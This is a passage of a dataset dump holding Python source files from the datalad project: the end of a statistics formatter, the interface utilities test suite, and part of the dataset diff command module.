convenience)\"\"\"\n return self.__class__(**self._get_updated_total())\n\n def as_dict(self):\n return self._current.copy()\n\n def as_str(self, mode='full'):\n \"\"\"\n\n Parameters\n ----------\n mode : {'full', 'line'}\n \"\"\"\n\n # Example\n #\"\"\"\n #URLs processed: {urls}\n # downloaded: {downloaded}\n # downloaded size: {downloaded_size}\n #Files processed: {files}\n # skipped: {skipped}\n # renamed: {renamed}\n # removed: {removed}\n # added to git: {add_git}\n # added to annex: {add_annex}\n # overwritten: {overwritten}\n #Branches merged:\n # upstream -> master\n #\"\"\"\n\n # TODO: improve\n entries = self.as_dict()\n entries.update({\n k: (_FORMATTERS[k](entries[k]) if entries[k] else '')\n for k in _FORMATTERS\n })\n\n out_formats = [\n (\"URLs processed\", \"urls\"),\n (\" downloaded\", \"downloaded\"),\n (\" size\", \"downloaded_size\"),\n (\"Files processed\", \"files\"),\n (\" skipped\", \"skipped\"),\n (\" renamed\", \"renamed\"),\n (\" removed\", \"removed\"),\n (\" overwritten\", \"overwritten\"),\n (\" +git\", \"add_git\"),\n (\" +annex\", \"add_annex\"),\n (\"Branches merged\", \"merges\"),\n (\"Datasets crawled\", \"datasets_crawled\"),\n (\" failed\", \"datasets_crawl_failed\"),\n ]\n # Filter out empty/0 ones\n out = [\"%s: \" % s + str(entries[m]) for s, m in out_formats if entries[m]]\n if mode == 'full':\n return '\\n'.join(out)\n elif mode == 'line':\n for i, o in enumerate(out):\n if o[0] != ' ':\n out[i] = ' ' + o\n return ','.join(out).lstrip()\n #return \"{files} files (git/annex: {add_git}/{add_annex}), \" \\\n # \"{skipped} skipped, {renamed} renamed, {overwritten} overwritten\".format(\n # **entries)\n else:\n raise ValueError(\"Unknown mode %s\" % mode)\n" }, { "alpha_fraction": 0.5712394714355469, "alphanum_fraction": 0.5770934224128723, "avg_line_length": 32.98788833618164, "blob_id": "ed1fb658aabde1fe5b2fd9775c150542c2ff78af", "content_id": "54f5e478b67b34523d2b1eec48708a38c51ffae7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19645, "license_type": "permissive", "max_line_length": 87, "num_lines": 578, "path": "/datalad/interface/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test interface.utils\n\n\"\"\"\n\nimport logging\nimport re\nfrom contextlib import contextmanager\nfrom os.path import exists\nfrom os.path import join as opj\nfrom time import sleep\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n)\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.support.constraints import (\n EnsureKeyChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.tests.utils_pytest import (\n assert_dict_equal,\n assert_equal,\n assert_in,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_re_in,\n assert_repo_status,\n assert_result_count,\n assert_true,\n ok_,\n slow,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n swallow_logs,\n swallow_outputs,\n)\n\nfrom ..base import Interface\nfrom ..results import get_status_dict\nfrom ..utils import (\n discover_dataset_trace_to_targets,\n handle_dirty_dataset,\n)\n\n__docformat__ = 'restructuredtext'\nlgr = logging.getLogger('datalad.interface.tests.test_utils')\n_dirty_modes = ('fail', 'ignore', 'save-before')\n\n\ndef _check_all_clean(ds, state):\n assert state is not None\n for mode in _dirty_modes:\n # nothing wrong, nothing saved\n handle_dirty_dataset(ds, mode)\n assert_equal(state, ds.repo.get_hexsha())\n\n\ndef _check_auto_save(ds, orig_state):\n handle_dirty_dataset(ds, 'ignore')\n assert_raises(RuntimeError, handle_dirty_dataset, ds, 'fail')\n handle_dirty_dataset(ds, 'save-before')\n state = ds.repo.get_hexsha()\n assert_not_equal(orig_state, state)\n _check_all_clean(ds, state)\n return state\n\n\n@with_tempfile(mkdir=True)\ndef test_dirty(path=None):\n for mode in _dirty_modes:\n # does nothing without a dataset\n handle_dirty_dataset(None, mode)\n # placeholder, but not yet created\n ds = Dataset(path)\n # unknown mode\n assert_raises(ValueError, handle_dirty_dataset, ds, 'MADEUP')\n # not yet created is very dirty\n assert_raises(RuntimeError, handle_dirty_dataset, ds, 'fail')\n handle_dirty_dataset(ds, 'ignore')\n assert_raises(RuntimeError, handle_dirty_dataset, ds, 'save-before')\n # should yield a clean repo\n ds.create()\n orig_state = ds.repo.get_hexsha()\n _check_all_clean(ds, orig_state)\n # tainted: untracked\n with open(opj(ds.path, 'something'), 'w') as f:\n f.write('some')\n # we don't want to auto-add untracked files by saving (anymore)\n assert_raises(AssertionError, _check_auto_save, ds, orig_state)\n # tainted: staged\n ds.repo.add('something', git=True)\n orig_state = _check_auto_save(ds, orig_state)\n # tainted: submodule\n # not added to super on purpose!\n subds = ds.create('subds')\n _check_all_clean(subds, subds.repo.get_hexsha())\n assert_repo_status(ds.path)\n # subdataset must be added as a submodule!\n assert_equal(ds.subdatasets(result_xfm='relpaths'), ['subds'])\n\n\ndemo_hierarchy = {\n 'a': {\n 'aa': {\n 'file_aa': 'file_aa'}},\n 'b': {\n 'ba': {\n 'file_ba': 'file_ba'},\n 'bb': {\n 'bba': {\n 'bbaa': {\n 'file_bbaa': 'file_bbaa'}},\n 'file_bb': 'file_bb'}},\n 'c': {\n 'ca': {\n 'file_ca': 'file_ca'},\n 'file_c': 'file_c'},\n 'd': {\n 'da': {\n 'file_da': 'file_da'},\n 'db': {\n 'file_db': 'file_db'},\n 'file_d': 'file_d'},\n}\n\n\ndef make_demo_hierarchy_datasets(path, tree, parent=None):\n if parent is None:\n parent = Dataset(path).create(force=True)\n for node, items in tree.items():\n if isinstance(items, dict):\n node_path = opj(path, node)\n nodeds = parent.create(node_path, force=True)\n make_demo_hierarchy_datasets(node_path, items, parent=nodeds)\n return parent\n\n\n@slow # 74.4509s\n@with_tree(demo_hierarchy)\ndef test_save_hierarchy(path=None):\n # this test doesn't use API`remove` to avoid circularities\n ds = make_demo_hierarchy_datasets(path, demo_hierarchy)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n ds_bb = Dataset(opj(ds.path, 'b', 'bb'))\n ds_bba = Dataset(opj(ds_bb.path, 'bba'))\n ds_bbaa = Dataset(opj(ds_bba.path, 'bbaa'))\n # introduce a change at the lowest level\n ds_bbaa.repo.remove('file_bbaa')\n for d in (ds, ds_bb, ds_bba, ds_bbaa):\n ok_(d.repo.dirty)\n # need to give file specifically, otherwise it will simply just preserve\n # staged changes\n ds_bb.save(path=opj(ds_bbaa.path, 'file_bbaa'))\n # it has saved all changes in the subtrees spanned\n # by the given datasets, but nothing else\n for d in (ds_bb, ds_bba, ds_bbaa):\n assert_repo_status(d.path)\n ok_(ds.repo.dirty)\n # now with two modified repos\n d = Dataset(opj(ds.path, 'd'))\n da = Dataset(opj(d.path, 'da'))\n da.repo.remove('file_da')\n db = Dataset(opj(d.path, 'db'))\n db.repo.remove('file_db')\n # generator\n d.save(recursive=True)\n for d in (d, da, db):\n assert_repo_status(d.path)\n ok_(ds.repo.dirty)\n # and now with files all over the place and saving\n # all the way to the root\n aa = Dataset(opj(ds.path, 'a', 'aa'))\n aa.repo.remove('file_aa')\n ba = Dataset(opj(ds.path, 'b', 'ba'))\n ba.repo.remove('file_ba')\n bb = Dataset(opj(ds.path, 'b', 'bb'))\n bb.repo.remove('file_bb')\n c = Dataset(opj(ds.path, 'c'))\n c.repo.remove('file_c')\n ca = Dataset(opj(ds.path, 'c', 'ca'))\n ca.repo.remove('file_ca')\n d = Dataset(opj(ds.path, 'd'))\n d.repo.remove('file_d')\n ds.save(\n # append trailing slashes to the path to indicate that we want to\n # have the staged content in the dataset saved, rather than only the\n # subdataset state in the respective superds.\n path=[opj(p, '')\n for p in (aa.path, ba.path, bb.path, c.path, ca.path, d.path)])\n\n\n# Note: class name needs to match module's name\n@build_doc\nclass TestUtils(Interface):\n \"\"\"TestUtil's fake command\"\"\"\n\n result_renderer = 'tailored' # overrides None default\n return_type = 'item-or-list' # overrides 'list'\n\n _params_ = dict(\n number=Parameter(\n args=(\"-n\", \"--number\",),\n doc=\"\"\"It's a number\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to update. If\n no dataset is given, an attempt is made to identify the dataset\n based on the input and/or the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n result_fn=Parameter(\n args=tuple(), # Hide this from the cmdline parser.\n doc=\"\"\"Generate the result records with this function\n rather than using the default logic. `number` will be\n passed as an argument.\"\"\"),)\n\n @staticmethod\n @datasetmethod(name='fake_command')\n @eval_results\n def __call__(number, dataset=None, result_fn=None):\n if result_fn:\n yield from result_fn(number)\n else:\n for i in range(number):\n # this dict will need to have the minimum info\n # required by eval_results\n yield {'path': 'some', 'status': 'ok', 'somekey': i,\n 'action': 'off'}\n\n\ndef test_eval_results_plus_build_doc():\n\n # test docs\n\n # docstring was build already:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n TestUtils().__call__(1)\n assert_not_in(\"Building doc for\", cml.out)\n # docstring accessible both ways:\n doc1 = Dataset.fake_command.__doc__\n doc2 = TestUtils().__call__.__doc__\n\n # docstring was built from Test_Util's definition:\n assert_equal(doc1, doc2)\n assert_in(\"TestUtil's fake command\", doc1)\n assert_in(\"Parameters\", doc1)\n assert_in(\"It's a number\", doc1)\n\n # docstring shows correct override values of defaults in eval_params\n assert_re_in(\"Default:\\\\s+'tailored'\", doc1, match=False)\n assert_re_in(\"Default:\\\\s+'item-or-list'\", doc1, match=False)\n\n # docstring also contains eval_result's parameters:\n assert_in(\"result_filter\", doc1)\n assert_in(\"return_type\", doc1)\n assert_in(\"list\", doc1)\n assert_in(\"None\", doc1)\n assert_in(\"return value behavior\", doc1)\n assert_in(\"dictionary is passed\", doc1)\n\n # test eval_results is able to determine the call, a method of which it is\n # decorating:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n Dataset('/does/not/matter').fake_command(3)\n assert_in(\"Determined class of decorated function: {}\"\n \"\".format(TestUtils().__class__), cml.out)\n\n # test results:\n result = TestUtils().__call__(2)\n assert_equal(len(list(result)), 2)\n result = Dataset('/does/not/matter').fake_command(3)\n assert_equal(len(list(result)), 3)\n\n # test absent side-effect of popping eval_defaults\n kwargs = dict(return_type='list')\n TestUtils().__call__(2, **kwargs)\n assert_equal(list(kwargs), ['return_type'])\n\n # test signature:\n from datalad.utils import getargspec\n assert_equal(getargspec(Dataset.fake_command)[0],\n ['number', 'dataset', 'result_fn'])\n assert_equal(getargspec(TestUtils.__call__)[0],\n ['number', 'dataset', 'result_fn'])\n\n\ndef test_result_filter():\n # ensure baseline without filtering\n assert_equal(\n [r['somekey'] for r in TestUtils().__call__(4)],\n [0, 1, 2, 3])\n # test two functionally equivalent ways to filter results\n # 1. Constraint-based -- filter by exception\n # we have a full set of AND and OR operators for this\n # 2. custom filer function -- filter by boolean return value\n for filt in (\n EnsureKeyChoice('somekey', (0, 2)),\n lambda x: x['somekey'] in (0, 2)):\n assert_equal(\n [r['somekey'] for r in TestUtils().__call__(\n 4,\n result_filter=filt)],\n [0, 2])\n # constraint returns full dict\n assert_dict_equal(\n TestUtils().__call__(\n 4,\n result_filter=filt)[-1],\n {'action': 'off', 'path': 'some', 'status': 'ok', 'somekey': 2})\n\n # test more sophisticated filters that actually get to see the\n # API call's kwargs\n def greatfilter(res, **kwargs):\n assert_equal(kwargs.get('dataset', 'bob'), 'awesome')\n return True\n TestUtils().__call__(4, dataset='awesome', result_filter=greatfilter)\n\n def sadfilter(res, **kwargs):\n assert_equal(kwargs.get('dataset', 'bob'), None)\n return True\n TestUtils().__call__(4, result_filter=sadfilter)\n\n\n@with_tree({k: v for k, v in demo_hierarchy.items() if k in ['a', 'd']})\n@with_tempfile(mkdir=True)\ndef test_discover_ds_trace(path=None, otherdir=None):\n ds = make_demo_hierarchy_datasets(\n path,\n {k: v for k, v in demo_hierarchy.items() if k in ['a', 'd']})\n a = opj(ds.path, 'a')\n aa = opj(a, 'aa')\n d = opj(ds.path, 'd')\n db = opj(d, 'db')\n # we have to check whether we get the correct hierarchy, as the test\n # subject is also involved in this\n assert_true(exists(opj(db, 'file_db')))\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n # now two datasets which are not available locally, but we\n # know about them (e.g. from metadata)\n dba = opj(db, 'sub', 'dba')\n dbaa = opj(dba, 'subsub', 'dbaa')\n for input, eds, goal in (\n ([], None, {}),\n ([ds.path], None, {}),\n ([otherdir], None, {}),\n ([opj(ds.path, 'nothere')], None, {}),\n ([opj(d, 'nothere')], None, {}),\n ([opj(db, 'nothere')], None, {}),\n ([a], None,\n {ds.path: set([a])}),\n ([aa, a], None,\n {ds.path: set([a]), a: set([aa])}),\n ([db], None,\n {ds.path: set([d]), d: set([db])}),\n ([opj(db, 'file_db')], None,\n {ds.path: set([d]), d: set([db])}),\n # just a regular non-existing path\n ([dba], None, {}),\n # but if we inject this knowledge it must come back out\n # as the child of the closest existing dataset\n ([dba], [dba],\n {ds.path: set([d]), d: set([db]), db: set([dba])}),\n # regardless of the depth\n ([dbaa], [dbaa],\n {ds.path: set([d]), d: set([db]), db: set([dbaa])}),\n ([dba, dbaa], [dba, dbaa],\n {ds.path: set([d]), d: set([db]), db: set([dba, dbaa])}),\n # we can simply add existing and non-existing datasets to the\n # include list get the desired result\n ([d, dba, dbaa], [d, dba, dbaa],\n {ds.path: set([d]), d: set([db]), db: set([dba, dbaa])}),\n ):\n spec = {}\n discover_dataset_trace_to_targets(ds.path, input, [], spec, includeds=eds)\n assert_dict_equal(spec, goal)\n\n\n@contextmanager\ndef _swallow_outputs(isatty=True):\n with swallow_outputs() as cmo:\n stdout = cmo.handles[0]\n stdout.isatty = lambda: isatty\n yield cmo\n\n\ndef test_utils_suppress_similar():\n tu = TestUtils()\n\n # Check suppression boundary for straight chain of similar\n # messages.\n\n # yield test results immediately to make test run fast\n sleep_dur = 0.0\n\n def n_foo(number):\n for i in range(number):\n yield dict(action=\"foo\",\n status=\"ok\",\n path=\"path{}\".format(i))\n sleep(sleep_dur)\n\n\n with _swallow_outputs() as cmo:\n cmo.isatty = lambda: True\n list(tu(9, result_fn=n_foo, result_renderer=\"default\"))\n assert_in(\"path8\", cmo.out)\n assert_not_in(\"suppressed\", cmo.out)\n\n with _swallow_outputs() as cmo:\n list(tu(10, result_fn=n_foo, result_renderer=\"default\"))\n assert_in(\"path9\", cmo.out)\n assert_not_in(\"suppressed\", cmo.out)\n\n with _swallow_outputs() as cmo:\n list(tu(11, result_fn=n_foo, result_renderer=\"default\"))\n assert_not_in(\"path10\", cmo.out)\n assert_re_in(r\"[^-0-9]1 .* suppressed\", cmo.out, match=False)\n\n with _swallow_outputs() as cmo:\n # for this one test yield results slightly slower than 2Hz\n # such that we can see each individual suppression message\n # and no get caught by the rate limiter\n sleep_dur = 0.51\n list(tu(13, result_fn=n_foo, result_renderer=\"default\"))\n assert_not_in(\"path10\", cmo.out)\n # We see an update for each result.\n assert_re_in(r\"1 .* suppressed\", cmo.out, match=False)\n assert_re_in(r\"2 .* suppressed\", cmo.out, match=False)\n assert_re_in(r\"3 .* suppressed\", cmo.out, match=False)\n\n # make tests run fast again\n sleep_dur = 0.0\n\n with _swallow_outputs(isatty=False) as cmo:\n list(tu(11, result_fn=n_foo, result_renderer=\"default\"))\n assert_in(\"path10\", cmo.out)\n\n # Check a chain of similar messages, split in half by a distinct one.\n\n def n_foo_split_by_a_bar(number):\n half = number // 2 - 1\n for i in range(number):\n yield dict(action=\"foo\",\n status=\"ok\",\n path=\"path{}\".format(i))\n if i == half:\n yield dict(action=\"bar\",\n status=\"ok\",\n path=\"path\")\n\n with _swallow_outputs() as cmo:\n list(tu(20, result_fn=n_foo_split_by_a_bar, result_renderer=\"default\"))\n assert_in(\"path10\", cmo.out)\n assert_in(\"path19\", cmo.out)\n assert_not_in(\"suppressed\", cmo.out)\n\n with _swallow_outputs() as cmo:\n list(tu(21, result_fn=n_foo_split_by_a_bar, result_renderer=\"default\"))\n assert_in(\"path10\", cmo.out)\n assert_not_in(\"path20\", cmo.out)\n assert_re_in(\"[^-0-9]1 .* suppressed\", cmo.out, match=False)\n\n\nclass TestUtils2(Interface):\n # result_renderer = custom_renderer\n _params_ = dict(\n number=Parameter(\n args=(\"--path\",),\n constraints=EnsureStr() | EnsureNone()),\n )\n @staticmethod\n @eval_results\n def __call__(path=None):\n def logger(msg, *args):\n return msg % args\n if path:\n # we will be testing for path %s\n message = (\"all good %s\", \"my friend\")\n else:\n message = (\"kaboom %s %s\", \"greedy\")\n yield get_status_dict(\n action=\"test\",\n status=\"ok\",\n message=message,\n logger=logger,\n path=path or ''\n )\n\n\ndef test_incorrect_msg_interpolation():\n with assert_raises(TypeError) as cme:\n TestUtils2().__call__()\n # this must be our custom exception\n assert_re_in(\"Failed to render.*kaboom.*not enough arguments\", str(cme.value))\n\n # there should be no exception if reported in the record path contains %\n TestUtils2().__call__(\"%eatthis\")\n\n\nclass CustomResultRenderer(Interface):\n result_renderer = \"tailored\"\n _params_ = dict(x=Parameter(args=(\"x\",)))\n\n @staticmethod\n @eval_results\n def __call__(x):\n yield get_status_dict(action=\"foo\", status=\"ok\", message=\"message\",\n x=x, logger=lgr)\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n # This custom result renderer gets the command's keyword arguments and\n # all of the common ones too, even those not explicitly specified.\n assert_in(\"x\", kwargs)\n assert_in(\"on_failure\", kwargs)\n assert_in(\"result_filter\", kwargs)\n assert_in(\"result_renderer\", kwargs)\n\n\ndef test_custom_result_renderer():\n list(CustomResultRenderer().__call__(\"arg\"))\n\n\nclass CustomSummary(Interface):\n result_renderer = \"tailored\"\n _params_ = dict(x=Parameter(args=(\"x\",)))\n\n @staticmethod\n @eval_results\n def __call__(x):\n for action, status in [(\"test.one\", \"ok\"),\n (\"test.two\", \"ok\"),\n (\"test.two\", \"notneeded\"),\n (\"test.one\", \"ok\")]:\n yield get_status_dict(action=action, status=status,\n message=\"message\", x=x, logger=lgr)\n\n @staticmethod\n def custom_result_summary_renderer(*args):\n if getattr(CustomSummary, \"custom_result_summary_renderer_pass_summary\",\n False):\n action_summary = args[1]\n assert_equal(action_summary[\"test.one\"], {\"ok\": 2})\n assert_equal(action_summary[\"test.two\"], {\"ok\": 1, \"notneeded\": 1})\n results = args[0]\n assert_equal(len(results), 4)\n assert_result_count(results, 2, action=\"test.one\", status=\"ok\")\n assert_result_count(results, 1, action=\"test.two\", status=\"ok\")\n assert_result_count(results, 1, action=\"test.two\", status=\"notneeded\")\n\n\ndef test_custom_result_summary_renderer():\n list(CustomSummary().__call__(\"arg\"))\n try:\n CustomSummary.custom_result_summary_renderer_pass_summary = True\n list(CustomSummary().__call__(\"arg\"))\n finally:\n del CustomSummary.custom_result_summary_renderer_pass_summary\n" }, { "alpha_fraction": 0.5655592083930969, "alphanum_fraction": 0.5664459466934204, "avg_line_length": 36.75893020629883, "blob_id": "b66d0600a01397026dc074a2dd5ca482b5fe61d6", "content_id": "2a2a5295b35ac6c93f4d4e3e732bce58ac2664a4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16916, "license_type": "permissive", "max_line_length": 87, "num_lines": 448, "path": "/datalad/core/local/diff.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Report differences between two states of a dataset (hierarchy)\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os.path as op\nfrom datalad.utils import (\n ensure_list,\n ensure_unicode,\n get_dataset_root,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\n\nfrom datalad.distribution.dataset import (\n Dataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n path_under_rev_dataset,\n)\n\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\n\nfrom datalad.core.local.status import (\n Status,\n _common_diffstatus_params,\n)\nfrom datalad.support.exceptions import (\n InvalidGitReferenceError,\n)\n\nlgr = logging.getLogger('datalad.core.local.diff')\n\n\n@build_doc\nclass Diff(Interface):\n \"\"\"Report differences between two states of a dataset (hierarchy)\n\n The two to-be-compared states are given via the --from and --to options.\n These state identifiers are evaluated in the context of the (specified\n or detected) dataset. In the case of a recursive report on a dataset\n hierarchy, corresponding state pairs for any subdataset are determined\n from the subdataset record in the respective superdataset. Only changes\n recorded in a subdataset between these two states are reported, and so on.\n\n Any paths given as additional arguments will be used to constrain the\n difference report. As with Git's diff, it will not result in an error when\n a path is specified that does not exist on the filesystem.\n\n Reports are very similar to those of the `status` command, with the\n distinguished content types and states being identical.\n \"\"\"\n # make the custom renderer the default one, as the global default renderer\n # does not yield meaningful output for this command\n result_renderer = 'tailored'\n\n _params_ = dict(\n _common_diffstatus_params,\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"path to constrain the report to\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n fr=Parameter(\n args=(\"-f\", \"--from\",),\n dest='fr',\n metavar=\"REVISION\",\n doc=\"\"\"original state to compare to, as given by any identifier\n that Git understands.\"\"\",\n constraints=EnsureStr()),\n to=Parameter(\n args=(\"-t\", \"--to\",),\n metavar=\"REVISION\",\n doc=\"\"\"state to compare against the original state, as given by\n any identifier that Git understands. If none is specified,\n the state of the working tree will be compared.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n )\n\n _examples_ = [\n dict(text=\"Show unsaved changes in a dataset\",\n code_py=\"diff()\",\n code_cmd=\"datalad diff\"),\n dict(text=\"Compare a previous dataset state identified by shasum \"\n \"against current worktree\",\n code_py=\"diff(fr='SHASUM')\",\n code_cmd=\"datalad diff --from <SHASUM>\"),\n dict(text=\"Compare two branches against each other\",\n code_py=\"diff(fr='branch1', to='branch2')\",\n code_cmd=\"datalad diff --from branch1 --to branch2\"),\n dict(text=\"Show unsaved changes in the dataset and potential subdatasets\",\n code_py=\"diff(recursive=True)\",\n code_cmd=\"datalad diff -r\"),\n dict(text=\"Show unsaved changes made to a particular file\",\n code_py=\"diff(path='path/to/file')\",\n code_cmd=\"datalad diff <path/to/file>\"),\n ]\n\n @staticmethod\n @datasetmethod(name='diff')\n @eval_results\n def __call__(\n path=None,\n *,\n fr='HEAD',\n to=None,\n dataset=None,\n annex=None,\n untracked='normal',\n recursive=False,\n recursion_limit=None):\n yield from diff_dataset(\n dataset=dataset,\n fr=ensure_unicode(fr),\n to=ensure_unicode(to),\n constant_refs=False,\n path=path,\n annex=annex,\n untracked=untracked,\n recursive=recursive,\n recursion_limit=recursion_limit)\n\n @staticmethod\n def custom_result_renderer(res, **kwargs): # pragma: more cover\n Status.custom_result_renderer(res, **kwargs)\n\n\ndef diff_dataset(\n dataset,\n fr,\n to,\n constant_refs,\n path=None,\n annex=None,\n untracked='normal',\n recursive=False,\n recursion_limit=None,\n reporting_order='depth-first',\n datasets_only=False,\n):\n \"\"\"Internal helper to diff a dataset\n\n Parameters\n ----------\n dataset : Dataset\n Dataset to perform the diff on. `fr` and `to` parameters are interpreted\n in the context of this dataset.\n fr : str\n Commit-ish to compare from.\n to : str\n Commit-ish to compare to.\n constant_refs : bool\n If True, `fr` and `to` will be passed on unmodified to diff operations\n on subdatasets. This can be useful with symbolic references like tags\n to report subdataset changes independent of superdataset changes.\n If False, `fr` and `to` will be translated to the subdataset commit-ish\n that match the given commit-ish in the superdataset.\n path : Path-like, optional\n Paths to constrain the diff to (see main diff() command).\n annex : str, optional\n Reporting mode for annex properties (see main diff() command).\n untracked : str, optional\n Reporting mode for untracked content (see main diff() command).\n recursive : bool, optional\n Flag to enable recursive operation (see main diff() command).\n recursion_limit : int, optional\n Recursion limit (see main diff() command).\n reporting_order : {'depth-first', 'breadth-first', 'bottom-up'}, optional\n By default, subdataset content records are reported after the record\n on the subdataset's submodule in a superdataset (depth-first).\n Alternatively, report all superdataset records first, before reporting\n any subdataset content records (breadth-first). Both 'depth-first'\n and 'breadth-first' both report dataset content before considering\n subdatasets. Alternative 'bottom-up' mode is similar to 'depth-first'\n but dataset content is reported after reporting on subdatasets.\n datasets_only : bool, optional\n Consider only changes to (sub)datasets but limiting operation only to\n paths of subdatasets.\n Note: ATM incompatible with explicit specification of `path`.\n\n Yields\n ------\n dict\n DataLad result records.\n \"\"\"\n if reporting_order not in ('depth-first', 'breadth-first', 'bottom-up'):\n raise ValueError('Unknown reporting order: {}'.format(reporting_order))\n\n ds = require_dataset(\n dataset, check_installed=True, purpose='report difference')\n\n # we cannot really perform any sorting of paths into subdatasets\n # or rejecting paths based on the state of the filesystem, as\n # we need to be able to compare with states that are not represented\n # in the worktree (anymore)\n if path:\n if datasets_only:\n raise NotImplementedError(\n \"Analysis of provided paths in datasets_only mode is not implemented\"\n )\n\n ps = []\n # sort any path argument into the respective subdatasets\n for p in sorted(ensure_list(path)):\n # it is important to capture the exact form of the\n # given path argument, before any normalization happens\n # distinguish rsync-link syntax to identify\n # a dataset as whole (e.g. 'ds') vs its\n # content (e.g. 'ds/')\n # special case is the root dataset, always report its content\n # changes\n orig_path = str(p)\n resolved_path = resolve_path(p, dataset)\n p = \\\n resolved_path, \\\n orig_path.endswith(op.sep) or resolved_path == ds.pathobj\n str_path = str(p[0])\n root = get_dataset_root(str_path)\n if root is None:\n # no root, not possibly underneath the refds\n yield dict(\n action='status',\n path=str_path,\n refds=ds.path,\n status='error',\n message='path not underneath this dataset',\n logger=lgr)\n continue\n if path_under_rev_dataset(ds, str_path) is None:\n # nothing we support handling any further\n # there is only a single refds\n yield dict(\n path=str_path,\n refds=ds.path,\n action='diff',\n status='error',\n message=(\n \"dataset containing given paths is not underneath \"\n \"the reference dataset %s: %s\",\n ds, str_path),\n logger=lgr,\n )\n continue\n\n ps.append(p)\n path = ps\n\n # TODO we might want to move away from the single-pass+immediate-yield\n # paradigm for this command. If we gather all information first, we\n # could do post-processing and detect when a file (same gitsha, or same\n # key) was copied/moved from another dataset. Another command (e.g.\n # save) could act on this information and also move/copy\n # availability information or at least enhance the respective commit\n # message with cross-dataset provenance info\n\n # cache to help avoid duplicate status queries\n content_info_cache = {}\n for res in _diff_ds(\n ds,\n fr,\n to,\n constant_refs,\n recursion_limit\n if recursion_limit is not None and recursive\n else -1 if recursive else 0,\n # TODO recode paths to repo path reference\n origpaths=None if not path else dict(path),\n untracked=untracked,\n annexinfo=annex,\n cache=content_info_cache,\n order=reporting_order,\n datasets_only=datasets_only,\n ):\n res.update(\n refds=ds.path,\n logger=lgr,\n action='diff',\n )\n yield res\n\n\ndef _diff_ds(ds, fr, to, constant_refs, recursion_level, origpaths, untracked,\n annexinfo, cache, order='depth-first', datasets_only=False):\n if not ds.is_installed():\n # asked to query a subdataset that is not available\n lgr.debug(\"Skip diff of unavailable subdataset: %s\", ds)\n return\n\n repo = ds.repo\n repo_path = repo.pathobj\n if datasets_only:\n assert not origpaths # protected above with NotImplementedError\n paths = dict(\n (sds.pathobj.relative_to(ds.pathobj), False)\n for sds in ds.subdatasets(\n recursive=False,\n state='present',\n result_renderer='disabled',\n result_xfm='datasets',\n )\n )\n if not paths:\n # no subdatasets, nothing todo???\n return\n else:\n # filter and normalize paths that match this dataset before passing them\n # onto the low-level query method\n paths = None if origpaths is None \\\n else dict(\n (repo_path / p.relative_to(ds.pathobj), goinside)\n for p, goinside in origpaths.items()\n if ds.pathobj in p.parents or (p == ds.pathobj and goinside)\n )\n paths_arg = list(paths) if paths else None\n try:\n lgr.debug(\"Diff %s from '%s' to '%s'\", ds, fr, to)\n diff_state = repo.diffstatus(\n fr,\n to,\n paths=paths_arg,\n untracked=untracked,\n eval_submodule_state='full' if to is None else 'commit',\n _cache=cache)\n except InvalidGitReferenceError as e:\n yield dict(\n path=ds.path,\n status='impossible',\n message=str(e),\n )\n return\n\n if annexinfo and hasattr(repo, 'get_content_annexinfo'):\n # this will amend `diff_state`\n repo.get_content_annexinfo(\n paths=paths_arg,\n init=diff_state,\n eval_availability=annexinfo in ('availability', 'all'),\n ref=to)\n # if `fr` is None, we compare against a preinit state, and\n # a get_content_annexinfo on that state doesn't get us anything new\n if fr and fr != to:\n repo.get_content_annexinfo(\n paths=paths_arg,\n init=diff_state,\n eval_availability=annexinfo in ('availability', 'all'),\n ref=fr,\n key_prefix=\"prev_\")\n\n # potentially collect subdataset diff call specs for the end\n # (if order == 'breadth-first')\n ds_diffs = []\n subds_diffcalls = []\n for path, props in diff_state.items():\n pathinds = str(ds.pathobj / path.relative_to(repo_path))\n path_rec = dict(\n props,\n path=pathinds,\n # report the dataset path rather than the repo path to avoid\n # realpath/symlink issues\n parentds=ds.path,\n status='ok',\n )\n if order in ('breadth-first', 'depth-first'):\n yield path_rec\n elif order == 'bottom-up':\n ds_diffs.append(path_rec)\n 